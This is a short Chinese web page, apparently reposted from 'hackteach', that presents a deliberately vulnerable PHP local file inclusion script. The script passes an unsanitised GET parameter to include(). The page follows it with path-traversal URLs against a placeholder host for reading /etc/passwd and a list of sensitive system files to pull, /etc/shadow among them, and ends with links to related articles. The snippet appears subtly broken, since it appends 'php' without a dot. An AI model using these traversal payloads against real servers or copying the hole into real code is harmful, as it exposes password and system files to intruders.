php伪造本地文件包含漏洞的代码
2023-06-13 09:14:31 时间
代码:
复制代码代码如下:
<?php
$page=$_GET["page"];
include($page."php");
?>
你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
来自hackteach
相关文章
- PHP文件包含漏洞攻防实战(allow_url_fopen、open_basedir)
- struts2漏洞监测_struts2 漏洞 测试方案 与 解决方案
- 多漏洞组合实现百G数据泄漏
- Windows Print Spooler权限提升漏洞复现(CVE-2021-1675)
- 信息收集-DNS域传送漏洞工具-KaliLinux系统自带(dnsenum、dig)
- 测试MySQL触发器构建:PHP测试实例(mysql触发器php)
- 在Linux上快速搭建PHP开发环境(linux搭建php环境)
- PHP使用Redis实现高性能缓存(php-redis)
- 初探Linux中的PHP文件之旅(linux创建php文件)
- PHP文件包含漏洞总结
- 教你如何用 PHP 创建 MySQL 数据表(php创建mysql表)
- 如何在Linux系统下执行PHP文件?(linux下执行php)
- PHP实现在Linux系统中进行文件操作(php写linux文件)
- PHP编译Redis:提升网站性能的利器(php编译redis)
- PHP和MySQL协同修改数据库(php mysql 修改)
- Linux无法解析PHP文件,如何解决(linux 不解析php)
- 据使用PHP和MSSQL技术记录丰富的数据信息(php mssql记录数)
- Linux平台如何高效搜索PHP文件(linux搜索php)
- PHP与MSSQL联合 处理日期数据(php mssql 日期)
- Linux环境下的PHP脚本开发与应用(linux下php脚本)
- Linux下轻松执行PHP文件的方法(linux执行php文件)
- Redis面试题与PHP配合(redis面试题 php)
- Windows下PHP的任意文件执行漏洞
- 解决ASP(图像)上传漏洞的方法
- PHPSession_Regenerate_ID函数双释放内存破坏漏洞
- windows服务器下IIS6/7下PHP无法加载php_curl.dll等动态链接库
- PHP中防止直接访问或查看或下载config.php文件的方法
- PHP程序漏洞产生的原因分析与防范方法说明